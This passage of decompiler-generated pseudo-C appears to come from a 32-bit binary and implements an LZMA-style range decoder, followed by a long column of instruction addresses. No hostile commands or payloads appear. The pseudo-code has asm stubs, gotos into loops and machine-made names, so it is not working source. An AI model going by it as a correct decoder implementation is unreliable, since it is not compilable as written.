												_t524 = _t744;
												if(_t744 < 0x1000000) {
													_t524 = _t744 << 8;
													_t890 = _t890 << 0x00000008 |  *( *(_t1381 + 0x10)) & 0x000000ff;
													 *(_t1381 + 0x10) =  &(( *(_t1381 + 0x10))[1]);
												}
												_t832 = (_t524 >> 0xb) * _t1285;
												if(_t890 >= _t832) {
													_t500 = _t524 - _t832;
													_t893 = _t890 - _t832;
													_t751 = _t1285 >> 5;
													 *(_t1311 + _t543 * 2 - 0xc00) = _t1285 - _t751;
													L115:
													asm("sbb ecx, ecx");
													_t753 = (_t751 & 0xfffffffd) + 0xb;
													_t1246 = _t1311 - 0xa00;
													goto L116;
												} else {
													_t502 = _t832;
													_t1287 =  *(_t1381 + 0x1c);
													 *(_t1311 + _t543 * 2 - 0xc00) = (0x800 - _t1285 >> 5) + _t1285;
													_t1353 =  *((intOrPtr*)(_t1381 + 0x34));
													asm("sbb ebx, ebx");
													 *(_t1381 + 0x28) =  *(_t1381 + 0x28) + 1;
													_t839 =  *((_t543 &  *(_t1381 + 0x38)) -  *(_t1381 + 0x2c) + _t1287 + _t1353) & 0x000000ff;
													 *(_t1287 + _t1353) = _t839;
													asm("sbb ecx, ecx");
													 *(_t1381 + 0x1c) = _t1287 + 1;
													 *(_t1381 + 0x14) = (_t839 & 0xfffffffe) + 0xb;
													continue;
												}
											}
										} else {
											_t500 = _t1228;
											_t847 =  *(_t1381 + 0x14);
											 *((short*)(_t1311 + 0x20 + _t847 * 2)) = (0x800 - _t740 >> 5) + _t740;
											_t753 = _t847 + 0xc;
											_t1246 = _t1311 - 0x600;
											L116:
											_t949 =  *_t1246 & 0x0000ffff;
											 *(_t1381 + 0x14) = _t753;
											if(_t500 < 0x1000000) {
												_t828 =  *(_t1381 + 0x10);
												_t500 = _t500 << 8;
												_t893 = _t893 << 0x00000008 |  *_t828 & 0x000000ff;
												 *(_t1381 + 0x10) =  &(_t828[1]);
											}
											_t756 = (_t500 >> 0xb) * _t949;
											if(_t893 >= _t756) {
												_t501 = _t500 - _t756;
												_t894 = _t893 - _t756;
												 *_t1246 = _t949 - (_t949 >> 5);
												_t951 =  *(_t1246 + 0x10) & 0x0000ffff;
												if(_t501 < 0x1000000) {
													_t809 =  *(_t1381 + 0x10);
													_t501 = _t501 << 8;
													_t894 = _t894 << 0x00000008 |  *_t809 & 0x000000ff;
													 *(_t1381 + 0x10) =  &(_t809[1]);
												}
												_t761 = (_t501 >> 0xb) * _t951;
												if(_t894 >= _t761) {
													_t502 = _t501 - _t761;
													_t890 = _t894 - _t761;
													 *(_t1246 + 0x10) = _t951 - (_t951 >> 5);
													_t764 = 1;
													do {
														goto L153;
													} while (_t764 < 0x100);
													goto L159;
												} else {
													 *(_t1246 + 0x10) = (0x800 - _t951 >> 5) + _t951;
													_t1246 = _t1246 + 0x10 +  *(_t1381 + 0x24) * 2;
													_t1036 =  *(_t1246 + 2) & 0x0000ffff;
													_t518 = _t761;
													if(_t761 < 0x1000000) {
														_t518 = _t761 << 8;
														_t807 =  *(_t1381 + 0x10);
														_t894 = _t894 << 0x00000008 |  *_t807 & 0x000000ff;
														 *(_t1381 + 0x10) =  &(_t807[1]);
													}
													_t796 = (_t518 >> 0xb) * _t1036;
													if(_t894 >= _t796) {
														_t519 = _t518 - _t796;
														_t894 = _t894 - _t796;
														 *(_t1246 + 2) = _t1036 - (_t1036 >> 5);
														_t799 = 3;
													} else {
														_t519 = _t796;
														 *(_t1246 + 2) = (0x800 - _t1036 >> 5) + _t1036;
														_t799 = 2;
													}
													_t604 = _t799 + _t799;
													_t800 =  *(_t604 + _t1246) & 0x0000ffff;
													if(_t519 < 0x1000000) {
														_t519 = _t519 << 8;
														_t894 = _t894 << 0x00000008 |  *( *(_t1381 + 0x10)) & 0x000000ff;
														 *(_t1381 + 0x10) =  &(( *(_t1381 + 0x10))[1]);
													}
													_t1040 = (_t519 >> 0xb) * _t800;
													if(_t894 >= _t1040) {
														_t520 = _t519 - _t1040;
														_t890 = _t894 - _t1040;
														 *(_t604 + _t1246) = _t800 - (_t800 >> 5);
														_t604 = _t604 + 1;
													} else {
														_t520 = _t1040;
														 *(_t604 + _t1246) = (0x800 - _t800 >> 5) + _t800;
													}
													_t767 = _t604 + _t604;
													_t1043 =  *(_t767 + _t1246) & 0x0000ffff;
													if(_t520 < 0x1000000) {
														_t520 = _t520 << 8;
														_t890 = _t890 << 0x00000008 |  *( *(_t1381 + 0x10)) & 0x000000ff;
														 *(_t1381 + 0x10) =  &(( *(_t1381 + 0x10))[1]);
													}
													_t607 = (_t520 >> 0xb) * _t1043;
													if(_t890 >= _t607) {
														_t502 = _t520 - _t607;
														_t890 = _t890 - _t607;
														 *(_t767 + _t1246) = _t1043 - (_t1043 >> 5);
														_t767 = _t767 + 1;
													} else {
														_t502 = _t607;
														 *(_t767 + _t1246) = (0x800 - _t1043 >> 5) + _t1043;
													}
												}
											} else {
												 *_t1246 = (0x800 - _t949 >> 5) + _t949;
												_t1246 = _t1246 +  *(_t1381 + 0x24) * 2;
												_t1052 =  *(_t1246 + 2) & 0x0000ffff;
												_t521 = _t756;
												if(_t756 < 0x1000000) {
													_t521 = _t756 << 8;
													_t826 =  *(_t1381 + 0x10);
													_t893 = _t893 << 0x00000008 |  *_t826 & 0x000000ff;
													 *(_t1381 + 0x10) =  &(_t826[1]);
												}
												_t813 = (_t521 >> 0xb) * _t1052;
												if(_t893 >= _t813) {
													_t522 = _t521 - _t813;
													_t893 = _t893 - _t813;
													 *(_t1246 + 2) = _t1052 - (_t1052 >> 5);
													_t816 = 3;
												} else {
													_t522 = _t813;
													 *(_t1246 + 2) = (0x800 - _t1052 >> 5) + _t1052;
													_t816 = 2;
												}
												_t622 = _t816 + _t816;
												_t817 =  *(_t622 + _t1246) & 0x0000ffff;
												if(_t522 < 0x1000000) {
													_t522 = _t522 << 8;
													_t893 = _t893 << 0x00000008 |  *( *(_t1381 + 0x10)) & 0x000000ff;
													 *(_t1381 + 0x10) =  &(( *(_t1381 + 0x10))[1]);
												}
												_t1056 = (_t522 >> 0xb) * _t817;
												if(_t893 >= _t1056) {
													_t523 = _t522 - _t1056;
													_t890 = _t893 - _t1056;
													 *(_t622 + _t1246) = _t817 - (_t817 >> 5);
													_t622 = _t622 + 1;
												} else {
													_t523 = _t1056;
													 *(_t622 + _t1246) = (0x800 - _t817 >> 5) + _t817;
												}
												_t819 = _t622 + _t622;
												_t1059 =  *(_t819 + _t1246) & 0x0000ffff;
												if(_t523 < 0x1000000) {
													_t523 = _t523 << 8;
													_t890 = _t890 << 0x00000008 |  *( *(_t1381 + 0x10)) & 0x000000ff;
													 *(_t1381 + 0x10) =  &(( *(_t1381 + 0x10))[1]);
												}
												_t625 = (_t523 >> 0xb) * _t1059;
												if(_t890 >= _t625) {
													_t502 = _t523 - _t625;
													_t890 = _t890 - _t625;
													 *(_t819 + _t1246) = _t1059 - (_t1059 >> 5);
													_t767 = _t819 + 1 - 8;
												} else {
													_t502 = _t625;
													 *(_t819 + _t1246) = (0x800 - _t1059 >> 5) + _t1059;
													_t767 = _t819 - 8;
												}
												while(1) {
													 *(_t1381 + 0x30) = _t767;
													if( *(_t1381 + 0x14) < 0xc) {
														goto L231;
													}
													goto L161;
												}
											}
											 *(_t1381 + 0x30) = _t767;
											if( *(_t1381 + 0x14) < 0xc) {
												goto L231;
											}
										}
									} else {
										 *(_t1311 + _t543 * 2 - 0x200) = (0x800 - _t737 >> 5) + _t737;
										_t525 = _t947;
										_t1299 = _t1311 + 0x280;
										if( *(_t1381 + 0x28) != 0 ||  *(_t1381 + 0x4c) != 0) {
											_t848 =  *(_t1381 + 0x1c);
											if(_t848 == 0) {
												_t848 =  *(_t1381 + 0x38);
											}
											_t543 = (( *(_t848 +  *((intOrPtr*)(_t1381 + 0x34)) - 1) & 0x000000ff) + ( *(_t1381 + 0x28) << 0x00000008) &  *(_t1381 + 0x50)) <<  *(_t1381 + 0x54);
											_t1299 = _t1299 + (_t543 + _t543 * 2) * 2;
										}
										_t853 =  *(_t1381 + 0x14);
										 *(_t1381 + 0x28) =  *(_t1381 + 0x28) + 1;
										if(_t853 >= 7) {
											asm("sbb ebx, ebx");
											 *(_t1381 + 0x14) =  *(_t1381 + 0x14) - (_t543 & 0xfffffffd) + 6;
											asm("sbb ebp, ebp");
											_t1358 = ( *( *((intOrPtr*)(_t1381 + 0x34)) + (_t1311 &  *(_t1381 + 0x38)) -  *(_t1381 + 0x2c) +  *(_t1381 + 0x1c)) & 0x000000ff) + ( *( *((intOrPtr*)(_t1381 + 0x34)) + (_t1311 &  *(_t1381 + 0x38)) -  *(_t1381 + 0x2c) +  *(_t1381 + 0x1c)) & 0x000000ff);
											_t859 = _t1358 & 0x00000100;
											_t648 =  *(_t1299 + 0x202 + _t859 * 2) & 0x0000ffff;
											if(_t947 < 0x1000000) {
												_t525 = _t947 << 8;
												_t890 = _t890 << 0x00000008 |  *( *(_t1381 + 0x10)) & 0x000000ff;
												 *(_t1381 + 0x10) =  &(( *(_t1381 + 0x10))[1]);
											}
											_t1074 = (_t525 >> 0xb) * _t648;
											if(_t890 >= _t1074) {
												_t526 = _t525 - _t1074;
												_t890 = _t890 - _t1074;
												 *(_t1299 + 0x202 + _t859 * 2) = _t648 - (_t648 >> 5);
												_t650 = 3;
											} else {
												_t526 = _t1074;
												 *(_t1299 + 0x202 + _t859 * 2) = (0x800 - _t648 >> 5) + _t648;
												_t650 = 2;
												_t859 = _t859 ^ 0x00000100;
											}
											_t1359 = _t1358 + _t1358;
											_t1077 = _t859;
											 *(_t1381 + 0x20) = _t1077;
											_t860 = _t859 & _t1359;
											_t1080 = _t1299 + (_t1077 + _t860 + _t650) * 2;
											 *(_t1381 + 0x18) = _t1080;
											_t1081 =  *_t1080 & 0x0000ffff;
											 *(_t1381 + 0x24) = _t1359;
											if(_t526 < 0x1000000) {
												_t526 = _t526 << 8;
												_t890 = _t890 << 0x00000008 |  *( *(_t1381 + 0x10)) & 0x000000ff;
												 *(_t1381 + 0x10) =  &(( *(_t1381 + 0x10))[1]);
											}
											_t1362 = (_t526 >> 0xb) * _t1081;
											if(_t890 >= _t1362) {
												_t527 = _t526 - _t1362;
												_t890 = _t890 - _t1362;
												 *( *(_t1381 + 0x18)) = _t1081 - (_t1081 >> 5);
												_t108 = _t650 + 1; // 0x4
												_t1366 = _t650 + _t108;
											} else {
												_t527 = _t1362;
												_t860 = _t860 ^  *(_t1381 + 0x20);
												 *( *(_t1381 + 0x18)) = (0x800 - _t1081 >> 5) + _t1081;
												_t1366 = _t650 + _t650;
											}
											_t1084 =  *(_t1381 + 0x24) +  *(_t1381 + 0x24);
											_t651 = _t860;
											_t861 = _t860 & _t1084;
											 *(_t1381 + 0x20) = _t651;
											 *(_t1381 + 0x24) = _t1084;
											_t1085 = _t1299 + (_t651 + _t861 + _t1366) * 2;
											 *(_t1381 + 0x18) = _t1085;
											_t1086 =  *_t1085 & 0x0000ffff;
											if(_t527 < 0x1000000) {
												_t527 = _t527 << 8;
												_t890 = _t890 << 0x00000008 |  *( *(_t1381 + 0x10)) & 0x000000ff;
												 *(_t1381 + 0x10) =  &(( *(_t1381 + 0x10))[1]);
											}
											_t656 = (_t527 >> 0xb) * _t1086;
											if(_t890 >= _t656) {
												_t528 = _t527 - _t656;
												_t890 = _t890 - _t656;
												 *( *(_t1381 + 0x18)) = _t1086 - (_t1086 >> 5);
												_t1367 = _t1366 + _t1366 + 1;
											} else {
												_t528 = _t656;
												_t1367 = _t1366 + _t1366;
												_t861 = _t861 ^  *(_t1381 + 0x20);
												 *( *(_t1381 + 0x18)) = (0x800 - _t1086 >> 5) + _t1086;
											}
											_t1089 =  *(_t1381 + 0x24) +  *(_t1381 + 0x24);
											_t660 = _t861;
											_t862 = _t861 & _t1089;
											 *(_t1381 + 0x20) = _t660;
											 *(_t1381 + 0x24) = _t1089;
											_t1090 = _t1299 + (_t660 + _t862 + _t1367) * 2;
											 *(_t1381 + 0x18) = _t1090;
											_t1091 =  *_t1090 & 0x0000ffff;
											if(_t528 < 0x1000000) {
												_t528 = _t528 << 8;
												_t890 = _t890 << 0x00000008 |  *( *(_t1381 + 0x10)) & 0x000000ff;
												 *(_t1381 + 0x10) =  &(( *(_t1381 + 0x10))[1]);
											}
											_t665 = (_t528 >> 0xb) * _t1091;
											if(_t890 >= _t665) {
												_t529 = _t528 - _t665;
												_t890 = _t890 - _t665;
												 *( *(_t1381 + 0x18)) = _t1091 - (_t1091 >> 5);
												_t1368 = _t1367 + _t1367 + 1;
											} else {
												_t529 = _t665;
												_t1368 = _t1367 + _t1367;
												_t862 = _t862 ^  *(_t1381 + 0x20);
												 *( *(_t1381 + 0x18)) = (0x800 - _t1091 >> 5) + _t1091;
											}
											_t1094 =  *(_t1381 + 0x24) +  *(_t1381 + 0x24);
											_t669 = _t862;
											_t863 = _t862 & _t1094;
											 *(_t1381 + 0x20) = _t669;
											 *(_t1381 + 0x24) = _t1094;
											_t1095 = _t1299 + (_t669 + _t863 + _t1368) * 2;
											 *(_t1381 + 0x18) = _t1095;
											_t1096 =  *_t1095 & 0x0000ffff;
											if(_t529 < 0x1000000) {
												_t529 = _t529 << 8;
												_t890 = _t890 << 0x00000008 |  *( *(_t1381 + 0x10)) & 0x000000ff;
												 *(_t1381 + 0x10) =  &(( *(_t1381 + 0x10))[1]);
											}
											_t674 = (_t529 >> 0xb) * _t1096;
											if(_t890 >= _t674) {
												_t530 = _t529 - _t674;
												_t890 = _t890 - _t674;
												 *( *(_t1381 + 0x18)) = _t1096 - (_t1096 >> 5);
												_t1369 = _t1368 + _t1368 + 1;
											} else {
												_t530 = _t674;
												_t1369 = _t1368 + _t1368;
												_t863 = _t863 ^  *(_t1381 + 0x20);
												 *( *(_t1381 + 0x18)) = (0x800 - _t1096 >> 5) + _t1096;
											}
											_t1099 =  *(_t1381 + 0x24) +  *(_t1381 + 0x24);
											_t678 = _t863;
											_t864 = _t863 & _t1099;
											 *(_t1381 + 0x20) = _t678;
											 *(_t1381 + 0x24) = _t1099;
											_t1100 = _t1299 + (_t678 + _t864 + _t1369) * 2;
											 *(_t1381 + 0x18) = _t1100;
											_t1101 =  *_t1100 & 0x0000ffff;
											if(_t530 < 0x1000000) {
												_t530 = _t530 << 8;
												_t890 = _t890 << 0x00000008 |  *( *(_t1381 + 0x10)) & 0x000000ff;
												 *(_t1381 + 0x10) =  &(( *(_t1381 + 0x10))[1]);
											}
											_t683 = (_t530 >> 0xb) * _t1101;
											if(_t890 >= _t683) {
												_t531 = _t530 - _t683;
												_t890 = _t890 - _t683;
												 *( *(_t1381 + 0x18)) = _t1101 - (_t1101 >> 5);
												_t1370 = _t1369 + _t1369 + 1;
											} else {
												_t531 = _t683;
												_t1370 = _t1369 + _t1369;
												_t864 = _t864 ^  *(_t1381 + 0x20);
												 *( *(_t1381 + 0x18)) = (0x800 - _t1101 >> 5) + _t1101;
											}
											_t1104 =  *(_t1381 + 0x24) +  *(_t1381 + 0x24);
											_t687 = _t864;
											_t865 = _t864 & _t1104;
											 *(_t1381 + 0x20) = _t687;
											 *(_t1381 + 0x24) = _t1104;
											_t1105 = _t1299 + (_t687 + _t865 + _t1370) * 2;
											 *(_t1381 + 0x18) = _t1105;
											_t1106 =  *_t1105 & 0x0000ffff;
											if(_t531 < 0x1000000) {
												_t531 = _t531 << 8;
												_t890 = _t890 << 0x00000008 |  *( *(_t1381 + 0x10)) & 0x000000ff;
												 *(_t1381 + 0x10) =  &(( *(_t1381 + 0x10))[1]);
											}
											_t692 = (_t531 >> 0xb) * _t1106;
											if(_t890 >= _t692) {
												_t532 = _t531 - _t692;
												_t890 = _t890 - _t692;
												 *( *(_t1381 + 0x18)) = _t1106 - (_t1106 >> 5);
												_t1371 = _t1370 + _t1370 + 1;
											} else {
												_t532 = _t692;
												_t1371 = _t1370 + _t1370;
												_t865 = _t865 ^  *(_t1381 + 0x20);
												 *( *(_t1381 + 0x18)) = (0x800 - _t1106 >> 5) + _t1106;
											}
											_t1112 = ( *(_t1381 + 0x24) +  *(_t1381 + 0x24) & _t865) + _t865 + _t1371;
											_t866 =  *(_t1299 + _t1112 * 2) & 0x0000ffff;
											_t1300 = _t1299 + _t1112 * 2;
											if(_t532 < 0x1000000) {
												_t1124 =  *(_t1381 + 0x10);
												_t532 = _t532 << 8;
												_t890 = _t890 << 0x00000008 |  *_t1124 & 0x000000ff;
												 *(_t1381 + 0x10) =  &(_t1124[1]);
											}
											_t1115 = (_t532 >> 0xb) * _t866;
											if(_t890 >= _t1115) {
												_t502 = _t532 - _t1115;
												_t890 = _t890 - _t1115;
												 *_t1300 = _t866 - (_t866 >> 5);
												_t1301 =  *(_t1381 + 0x1c);
												 *((char*)(_t1301 +  *((intOrPtr*)(_t1381 + 0x34)))) = _t1371 + _t1371 + 1;
												 *(_t1381 + 0x1c) = _t1301 + 1;
											} else {
												_t502 = _t1115;
												 *_t1300 = (0x800 - _t866 >> 5) + _t866;
												_t1303 =  *(_t1381 + 0x1c);
												 *((char*)(_t1303 +  *((intOrPtr*)(_t1381 + 0x34)))) = _t1371 + _t1371;
												 *(_t1381 + 0x1c) = _t1303 + 1;
											}
										} else {
											_t727 = _t853;
											if(_t853 >= 4) {
												_t727 = 3;
											}
											_t1378 =  *(_t1381 + 0x10);
											 *(_t1381 + 0x14) = _t853 - _t727;
											_t871 =  *(_t1299 + 2) & 0x0000ffff;
											if(_t947 < 0x1000000) {
												_t525 = _t947 << 8;
												_t890 = _t890 << 0x00000008 |  *_t1378 & 0x000000ff;
												_t1378 =  &(_t1378[1]);
												 *(_t1381 + 0x10) = _t1378;
											}
											_t1141 = (_t525 >> 0xb) * _t871;
											if(_t890 >= _t1141) {
												_t533 = _t525 - _t1141;
												_t890 = _t890 - _t1141;
												 *(_t1299 + 2) = _t871 - (_t871 >> 5);
												_t873 = 3;
											} else {
												_t533 = _t1141;
												 *(_t1299 + 2) = (0x800 - _t871 >> 5) + _t871;
												_t873 = 2;
											}
											_t728 = _t873 + _t873;
											_t874 =  *(_t728 + _t1299) & 0x0000ffff;
											if(_t533 < 0x1000000) {
												_t533 = _t533 << 8;
												_t890 = _t890 << 0x00000008 |  *_t1378 & 0x000000ff;
												_t1378 =  &(_t1378[1]);
												 *(_t1381 + 0x10) = _t1378;
											}
											_t1146 = (_t533 >> 0xb) * _t874;
											if(_t890 >= _t1146) {
												_t534 = _t533 - _t1146;
												_t890 = _t890 - _t1146;
												 *(_t728 + _t1299) = _t874 - (_t874 >> 5);
												_t728 = _t728 + 1;
											} else {
												_t534 = _t1146;
												 *(_t728 + _t1299) = (0x800 - _t874 >> 5) + _t874;
											}
											_t729 = _t728 + _t728;
											_t876 =  *(_t729 + _t1299) & 0x0000ffff;
											if(_t534 < 0x1000000) {
												_t534 = _t534 << 8;
												_t890 = _t890 << 0x00000008 |  *_t1378 & 0x000000ff;
												_t1378 =  &(_t1378[1]);
												 *(_t1381 + 0x10) = _t1378;
											}
											_t1151 = (_t534 >> 0xb) * _t876;
											if(_t890 >= _t1151) {
												_t535 = _t534 - _t1151;
												_t890 = _t890 - _t1151;
												 *(_t729 + _t1299) = _t876 - (_t876 >> 5);
												_t729 = _t729 + 1;
											} else {
												_t535 = _t1151;
												 *(_t729 + _t1299) = (0x800 - _t876 >> 5) + _t876;
											}
											_t730 = _t729 + _t729;
											_t878 =  *(_t730 + _t1299) & 0x0000ffff;
											if(_t535 < 0x1000000) {
												_t535 = _t535 << 8;
												_t890 = _t890 << 0x00000008 |  *_t1378 & 0x000000ff;
												_t1378 =  &(_t1378[1]);
												 *(_t1381 + 0x10) = _t1378;
											}
											_t1156 = (_t535 >> 0xb) * _t878;
											if(_t890 >= _t1156) {
												_t536 = _t535 - _t1156;
												_t890 = _t890 - _t1156;
												 *(_t730 + _t1299) = _t878 - (_t878 >> 5);
												_t730 = _t730 + 1;
											} else {
												_t536 = _t1156;
												 *(_t730 + _t1299) = (0x800 - _t878 >> 5) + _t878;
											}
											_t731 = _t730 + _t730;
											_t880 =  *(_t731 + _t1299) & 0x0000ffff;
											if(_t536 < 0x1000000) {
												_t536 = _t536 << 8;
												_t890 = _t890 << 0x00000008 |  *_t1378 & 0x000000ff;
												_t1378 =  &(_t1378[1]);
												 *(_t1381 + 0x10) = _t1378;
											}
											_t1161 = (_t536 >> 0xb) * _t880;
											if(_t890 >= _t1161) {
												_t537 = _t536 - _t1161;
												_t890 = _t890 - _t1161;
												 *(_t731 + _t1299) = _t880 - (_t880 >> 5);
												_t731 = _t731 + 1;
											} else {
												_t537 = _t1161;
												 *(_t731 + _t1299) = (0x800 - _t880 >> 5) + _t880;
											}
											_t732 = _t731 + _t731;
											_t882 =  *(_t732 + _t1299) & 0x0000ffff;
											if(_t537 < 0x1000000) {
												_t537 = _t537 << 8;
												_t890 = _t890 << 0x00000008 |  *_t1378 & 0x000000ff;
												_t1378 =  &(_t1378[1]);
												 *(_t1381 + 0x10) = _t1378;
											}
											_t1166 = (_t537 >> 0xb) * _t882;
											if(_t890 >= _t1166) {
												_t538 = _t537 - _t1166;
												_t890 = _t890 - _t1166;
												 *(_t732 + _t1299) = _t882 - (_t882 >> 5);
												_t732 = _t732 + 1;
											} else {
												_t538 = _t1166;
												 *(_t732 + _t1299) = (0x800 - _t882 >> 5) + _t882;
											}
											_t733 = _t732 + _t732;
											_t884 =  *(_t733 + _t1299) & 0x0000ffff;
											if(_t538 < 0x1000000) {
												_t538 = _t538 << 8;
												_t890 = _t890 << 0x00000008 |  *_t1378 & 0x000000ff;
												 *(_t1381 + 0x10) =  &(_t1378[1]);
											}
											_t1171 = (_t538 >> 0xb) * _t884;
											if(_t890 >= _t1171) {
												_t539 = _t538 - _t1171;
												_t890 = _t890 - _t1171;
												 *(_t733 + _t1299) = _t884 - (_t884 >> 5);
												_t733 = _t733 + 1;
											} else {
												_t539 = _t1171;
												 *(_t733 + _t1299) = (0x800 - _t884 >> 5) + _t884;
											}
											_t1379 = _t733 + _t733;
											_t886 =  *(_t1299 + _t1379) & 0x0000ffff;
											if(_t539 < 0x1000000) {
												_t1185 =  *(_t1381 + 0x10);
												_t539 = _t539 << 8;
												_t890 = _t890 << 0x00000008 |  *_t1185 & 0x000000ff;
												 *(_t1381 + 0x10) =  &(_t1185[1]);
											}
											_t1176 = (_t539 >> 0xb) * _t886;
											if(_t890 >= _t1176) {
												_t502 = _t539 - _t1176;
												_t890 = _t890 - _t1176;
												 *(_t1299 + _t1379) = _t886 - (_t886 >> 5);
												_t1305 =  *(_t1381 + 0x1c);
												 *((char*)(_t1305 +  *((intOrPtr*)(_t1381 + 0x34)))) = _t1379 + 1;
												 *(_t1381 + 0x1c) = _t1305 + 1;
											} else {
												_t502 = _t1176;
												 *(_t1299 + _t1379) = (0x800 - _t886 >> 5) + _t886;
												_t1307 =  *(_t1381 + 0x1c);
												 *((char*)(_t1307 +  *((intOrPtr*)(_t1381 + 0x34)))) = _t1379;
												 *(_t1381 + 0x1c) = _t1307 + 1;
											}
										}
										continue;
									}
									goto L253;
								}
								_t1251 =  *(_t1381 + 0x30);
								goto L250;
							}
							goto L243;
						}
						goto L253;
					}
					L153:
					_t544 = _t764 + _t764;
					_t765 =  *(_t544 + _t1246 + 0x200) & 0x0000ffff;
					if(_t502 < 0x1000000) {
						_t502 = _t502 << 8;
						_t890 = _t890 << 0x00000008 |  *( *(_t1381 + 0x10)) & 0x000000ff;
						 *(_t1381 + 0x10) =  &(( *(_t1381 + 0x10))[1]);
					}
					_t955 = (_t502 >> 0xb) * _t765;
					if(_t890 >= _t955) {
						_t502 = _t502 - _t955;
						_t890 = _t890 - _t955;
						 *(_t544 + _t1246 + 0x200) = _t765 - (_t765 >> 5);
						_t764 = _t544 + 1;
					} else {
						_t502 = _t955;
						 *(_t544 + _t1246 + 0x200) = (0x800 - _t765 >> 5) + _t765;
						_t764 = _t544;
					}
				}
			}
























































































































































































































































                                                                                                                                                      0x10009257
                                                                                                                                                      0x10009257
                                                                                                                                                      0x10009257
                                                                                                                                                      0x10009260
                                                                                                                                                      0x10009260
                                                                                                                                                      0x10009265
                                                                                                                                                      0x10009268
                                                                                                                                                      0x10009270
                                                                                                                                                      0x1000927c
                                                                                                                                                      0x1000927f
                                                                                                                                                      0x10009281
                                                                                                                                                      0x10009281
                                                                                                                                                      0x1000928b
                                                                                                                                                      0x10009290
                                                                                                                                                      0x100092ac
                                                                                                                                                      0x100092ae
                                                                                                                                                      0x100092b7
                                                                                                                                                      0x100092bf
                                                                                                                                                      0x10009292
                                                                                                                                                      0x10009292
                                                                                                                                                      0x100092a0
                                                                                                                                                      0x100092a8
                                                                                                                                                      0x100092a8
                                                                                                                                                      0x100092c8
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x100092ca
                                                                                                                                                      0x100092ca
                                                                                                                                                      0x100092d0
                                                                                                                                                      0x100092d5
                                                                                                                                                      0x100092d9
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x100092df
                                                                                                                                                      0x100092e2
                                                                                                                                                      0x100092e4
                                                                                                                                                      0x100092e4
                                                                                                                                                      0x100092ec
                                                                                                                                                      0x100092ef
                                                                                                                                                      0x100092f4
                                                                                                                                                      0x100092fb
                                                                                                                                                      0x100092fd
                                                                                                                                                      0x10009307
                                                                                                                                                      0x1000930a
                                                                                                                                                      0x1000930f
                                                                                                                                                      0x1000930f
                                                                                                                                                      0x10009318
                                                                                                                                                      0x1000931d
                                                                                                                                                      0x10009338
                                                                                                                                                      0x1000933a
                                                                                                                                                      0x10009343
                                                                                                                                                      0x10009347
                                                                                                                                                      0x1000931f
                                                                                                                                                      0x1000931f
                                                                                                                                                      0x1000932d
                                                                                                                                                      0x10009331
                                                                                                                                                      0x10009331
                                                                                                                                                      0x10009351
                                                                                                                                                      0x10009355
                                                                                                                                                      0x10009358
                                                                                                                                                      0x1000935c
                                                                                                                                                      0x10009365
                                                                                                                                                      0x10009368
                                                                                                                                                      0x1000936a
                                                                                                                                                      0x1000936d
                                                                                                                                                      0x1000936d
                                                                                                                                                      0x10009376
                                                                                                                                                      0x1000937b
                                                                                                                                                      0x10009391
                                                                                                                                                      0x10009393
                                                                                                                                                      0x1000939c
                                                                                                                                                      0x100093a0
                                                                                                                                                      0x1000937d
                                                                                                                                                      0x1000937d
                                                                                                                                                      0x1000938b
                                                                                                                                                      0x1000938b
                                                                                                                                                      0x100093a3
                                                                                                                                                      0x100093aa
                                                                                                                                                      0x100093ae
                                                                                                                                                      0x100093b7
                                                                                                                                                      0x100093ba
                                                                                                                                                      0x100093bc
                                                                                                                                                      0x100093bf
                                                                                                                                                      0x100093bf
                                                                                                                                                      0x100093c8
                                                                                                                                                      0x100093cd
                                                                                                                                                      0x100093e3
                                                                                                                                                      0x100093e5
                                                                                                                                                      0x100093ee
                                                                                                                                                      0x100093f2
                                                                                                                                                      0x100093cf
                                                                                                                                                      0x100093cf
                                                                                                                                                      0x100093dd
                                                                                                                                                      0x100093dd
                                                                                                                                                      0x100093f5
                                                                                                                                                      0x100093fc
                                                                                                                                                      0x10009400
                                                                                                                                                      0x10009409
                                                                                                                                                      0x1000940c
                                                                                                                                                      0x1000940e
                                                                                                                                                      0x10009411
                                                                                                                                                      0x10009411
                                                                                                                                                      0x1000941a
                                                                                                                                                      0x1000941f
                                                                                                                                                      0x10009435
                                                                                                                                                      0x10009437
                                                                                                                                                      0x10009440
                                                                                                                                                      0x10009444
                                                                                                                                                      0x10009421
                                                                                                                                                      0x10009421
                                                                                                                                                      0x1000942f
                                                                                                                                                      0x1000942f
                                                                                                                                                      0x10009447
                                                                                                                                                      0x1000944e
                                                                                                                                                      0x10009452
                                                                                                                                                      0x1000945b
                                                                                                                                                      0x1000945e
                                                                                                                                                      0x10009460
                                                                                                                                                      0x10009463
                                                                                                                                                      0x10009463
                                                                                                                                                      0x1000946c
                                                                                                                                                      0x10009471
                                                                                                                                                      0x10009487
                                                                                                                                                      0x10009489
                                                                                                                                                      0x10009492
                                                                                                                                                      0x10009496
                                                                                                                                                      0x10009473
                                                                                                                                                      0x10009473
                                                                                                                                                      0x10009481
                                                                                                                                                      0x10009481
                                                                                                                                                      0x1000949e
                                                                                                                                                      0x100094a1
                                                                                                                                                      0x100094a5
                                                                                                                                                      0x100094ae
                                                                                                                                                      0x100094b1
                                                                                                                                                      0x100094b6
                                                                                                                                                      0x100094b6
                                                                                                                                                      0x100094bf
                                                                                                                                                      0x100094c4
                                                                                                                                                      0x100094da
                                                                                                                                                      0x100094dc
                                                                                                                                                      0x100094e5
                                                                                                                                                      0x100094e9
                                                                                                                                                      0x100094c6
                                                                                                                                                      0x100094c6
                                                                                                                                                      0x100094d4
                                                                                                                                                      0x100094d4
                                                                                                                                                      0x100094ec
                                                                                                                                                      0x100094f2
                                                                                                                                                      0x10009734
                                                                                                                                                      0x1000973d
                                                                                                                                                      0x10009745
                                                                                                                                                      0x1000974d
                                                                                                                                                      0x10009751
                                                                                                                                                      0x10009751
                                                                                                                                                      0x10009754
                                                                                                                                                      0x10009758
                                                                                                                                                      0x10009760
                                                                                                                                                      0x10009764
                                                                                                                                                      0x1000976a
                                                                                                                                                      0x1000976c
                                                                                                                                                      0x1000976c
                                                                                                                                                      0x10009772
                                                                                                                                                      0x10009838
                                                                                                                                                      0x10009844
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x100094f8
                                                                                                                                                      0x10009501
                                                                                                                                                      0x10009504
                                                                                                                                                      0x1000950a
                                                                                                                                                      0x1000959a
                                                                                                                                                      0x1000959e
                                                                                                                                                      0x100095a1
                                                                                                                                                      0x100095a6
                                                                                                                                                      0x100095af
